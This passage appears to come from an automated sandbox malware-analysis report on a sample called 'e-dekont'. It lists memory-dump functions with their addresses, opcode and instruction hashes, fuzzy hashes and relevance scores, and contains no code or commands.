                                                        • Instruction Fuzzy Hash: B8C18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C06318 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b2778289e773f1f00554d0a556bc7f577a065298b1d55e9b17d9704eddb3850
                                                        • Instruction ID: 42b976f4c8b04f3ba36e103770d91a5ba157e7e2ec81d43c5d21732eac90e295
                                                        • Opcode Fuzzy Hash: 0b2778289e773f1f00554d0a556bc7f577a065298b1d55e9b17d9704eddb3850
                                                        • Instruction Fuzzy Hash: CDC18074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C008F0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e74350e62d8c045b05b4a38b281fce0811fc0fbd59809d94a59eb311723d338a
                                                        • Instruction ID: 12561035cfaeb65b1f36591bfa3b0b89d23cba063225a2b6ba63424c8d079653
                                                        • Opcode Fuzzy Hash: e74350e62d8c045b05b4a38b281fce0811fc0fbd59809d94a59eb311723d338a
                                                        • Instruction Fuzzy Hash: 44C18174E00218CFDB54DFA5C954BADBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C078F8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 255073630d0d80db0edaccce41ec0d658ea426504ca06fff12829bfe445049fb
                                                        • Instruction ID: 75ec050433759d10265f5844d85ac2e07c4732e7d7c8f24384b1afa4752c9e51
                                                        • Opcode Fuzzy Hash: 255073630d0d80db0edaccce41ec0d658ea426504ca06fff12829bfe445049fb
                                                        • Instruction Fuzzy Hash: CCC19074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C00498 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe818b617671541ddb8948bff606fb0a257a98d3be2876a10646c801e28d696c
                                                        • Instruction ID: 910c0190e9053c44f3e1c3964c82b498dcb03ffbc7299841c7847ec4a3bf8496
                                                        • Opcode Fuzzy Hash: fe818b617671541ddb8948bff606fb0a257a98d3be2876a10646c801e28d696c
                                                        • Instruction Fuzzy Hash: 02C18074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C00040 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7572409e33989af388ecc70ec18d018059dd394afbcb25c5828b81611d98fcfe
                                                        • Instruction ID: e298d0b442129029d3015dec3df5d2bf86e0d2bf1d1dd34dde9add1caaaef8d1
                                                        • Opcode Fuzzy Hash: 7572409e33989af388ecc70ec18d018059dd394afbcb25c5828b81611d98fcfe
                                                        • Instruction Fuzzy Hash: 8DC19174E01218CFDB54DFA5C954B9DBBB2BF89300F2080A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C07020 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d8c8ac8c80a95b69a2def5fe823dbeb228ac3552db2af19b772af1390497ef6
                                                        • Instruction ID: 059a37254ac7471ca9e783209c967bd668fc1c6fa71edb3b5191c3c04ff23094
                                                        • Opcode Fuzzy Hash: 0d8c8ac8c80a95b69a2def5fe823dbeb228ac3552db2af19b772af1390497ef6
                                                        • Instruction Fuzzy Hash: 52C19F74E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C055E8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24aa1e752da3a01aacb64fbc3c0ad1cc8dac92461065b876350203091474f963
                                                        • Instruction ID: fb621daf66a38a00520b82532558610aa15fb85e6adc3d5723a4e06b74dcbff8
                                                        • Opcode Fuzzy Hash: 24aa1e752da3a01aacb64fbc3c0ad1cc8dac92461065b876350203091474f963
                                                        • Instruction Fuzzy Hash: 66C19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C011A0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46d2f7fc7a9ae217a5db97720e4448fd95a148169955243a5ab1a615f2e516b8
                                                        • Instruction ID: d7315615f9357642183081c5515b2dc3838ee85d780bdf7d7659041ea7d5a879
                                                        • Opcode Fuzzy Hash: 46d2f7fc7a9ae217a5db97720e4448fd95a148169955243a5ab1a615f2e516b8
                                                        • Instruction Fuzzy Hash: A4C18074E01218CFDB54DFA5C994B9DBBB2BF89300F2481A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C081A8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 657339956f286fd517396bdf96c58d143f2739d8c953da961ba5d287858d27ef
                                                        • Instruction ID: 8bf1c30b709cf90841d078c87f9b017effbb072dd7dee4187c8424985530663a
                                                        • Opcode Fuzzy Hash: 657339956f286fd517396bdf96c58d143f2739d8c953da961ba5d287858d27ef
                                                        • Instruction Fuzzy Hash: 16C18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C00D48 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b940e5e9e792164a63730cc57cf895e8525eaa2873fd46d19a971fdff0c3ae50
                                                        • Instruction ID: 8823268d7532c822827a5581d53aa193091561cc0e59b13e3b6d49053b42c266
                                                        • Opcode Fuzzy Hash: b940e5e9e792164a63730cc57cf895e8525eaa2873fd46d19a971fdff0c3ae50
                                                        • Instruction Fuzzy Hash: BAC19F74E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C07D50 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4f82b9931b4bbedeaf332c1e11cbf86b7c525ecc4d2abcbb632a171c444473f
                                                        • Instruction ID: cfc8e49c80a0155934047aa7967d2762ce0de0d72351383e78998e932424c563
                                                        • Opcode Fuzzy Hash: a4f82b9931b4bbedeaf332c1e11cbf86b7c525ecc4d2abcbb632a171c444473f
                                                        • Instruction Fuzzy Hash: 7CC19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B42240 Relevance: .2, Instructions: 220COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2884851df46d87ca2c3a06eaa747e5210b40b3246cb292579dffbef84b60f906
                                                        • Instruction ID: 38ac3ec746f7ec8b8955c46a4a6b8073edd601b68dcf3f592a8570daf7e47fe5
                                                        • Opcode Fuzzy Hash: 2884851df46d87ca2c3a06eaa747e5210b40b3246cb292579dffbef84b60f906
                                                        • Instruction Fuzzy Hash: 3BA1F274D00218CFDB24DFA9C984B9DBBB1FF88310F249269E409AB3A1DB749985CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B42586 Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39a766787d92ad73495b14d610d71eb1a333fd0f53e357cacad1475214f15bed
                                                        • Instruction ID: 0b9f71f641d9ec0e2b4d7de9df74a160b8a270431f729d71e06622f052ec09af
                                                        • Opcode Fuzzy Hash: 39a766787d92ad73495b14d610d71eb1a333fd0f53e357cacad1475214f15bed
                                                        • Instruction Fuzzy Hash: 1591D174D00218CFDB24DFA8C994B9CBBB1FF49310F2092A9E509AB391DB74A985DF14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCF03B Relevance: .2, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2aebef77dad7c78a95f61ccb8d3ea3101477f342c8c84ee6985c3d55677dbc9
                                                        • Instruction ID: 2d78715e799d3a44ab68e7c81d006aa16bca5506ea1180f51e5db53b5a49ae77
                                                        • Opcode Fuzzy Hash: d2aebef77dad7c78a95f61ccb8d3ea3101477f342c8c84ee6985c3d55677dbc9
                                                        • Instruction Fuzzy Hash: C8A18B74A01229CFDB65DF24C994B99BBB2BB4A301F2085EAD40DA7354DB319E81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCF21B Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce29220b5bbb0ff362ea1bb295d2ef120b34927fc29ca6e10374c0f7f7adaa96
                                                        • Instruction ID: ca32ac77611e49ad865e6ca379e0ade211a5d659ce475fdf9f6fbc4e081c7d5d
                                                        • Opcode Fuzzy Hash: ce29220b5bbb0ff362ea1bb295d2ef120b34927fc29ca6e10374c0f7f7adaa96
                                                        • Instruction Fuzzy Hash: CD519F74A01229CFCB65DF24C994B99B7B2BF4A301F6089EAD40EA7354DB319E81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0E5D8 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        • Opcode ID: 023a481b2b3c9866b2cf9d4ec39c83acf08667e1480a0613ba3eb1eeff46c7ec
                                                        • Instruction ID: b30174c805fdc870c3db889e983c56c416baa9b5cce09fef9cf64a0422a7d3b1
                                                        • Opcode Fuzzy Hash: 023a481b2b3c9866b2cf9d4ec39c83acf08667e1480a0613ba3eb1eeff46c7ec
                                                        • Instruction Fuzzy Hash: 9141E771E8411E8BFF749A6D954077EA6A5AB88350F10057DCA26D77C0EA30CE81DBD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0E5C8 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        • Opcode ID: ef8a9debf15b715a9a8ef5a001aa5046403c859e580858a5aad716a0ae0be9e7
                                                        • Instruction ID: c10925f85ef5e913e840ab5ce127e7c849ffc46a4d659d5e505830d401b02761
                                                        • Opcode Fuzzy Hash: ef8a9debf15b715a9a8ef5a001aa5046403c859e580858a5aad716a0ae0be9e7
                                                        • Instruction Fuzzy Hash: 9431A971E8411E4BFF748A69855077FA6A6AB88300F1508BDC916E77C5EA30CE81DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DC60E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                                        • API String ID: 0-3001612457
                                                        • Opcode ID: 3a7bd2a08033bf56bd2710b98e034c35af1db7e4759424020e68a71fa296c459
                                                        • Instruction ID: ed6acab525b389b4a30a6507becc38bddf976e24884771aa27f16fec5dbc5baf
                                                        • Opcode Fuzzy Hash: 3a7bd2a08033bf56bd2710b98e034c35af1db7e4759424020e68a71fa296c459
                                                        • Instruction Fuzzy Hash: 8301BC31F400069F8B248E2DC844A2577EFAFC8A62735446EE046CB3B2DA31DC42C7C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%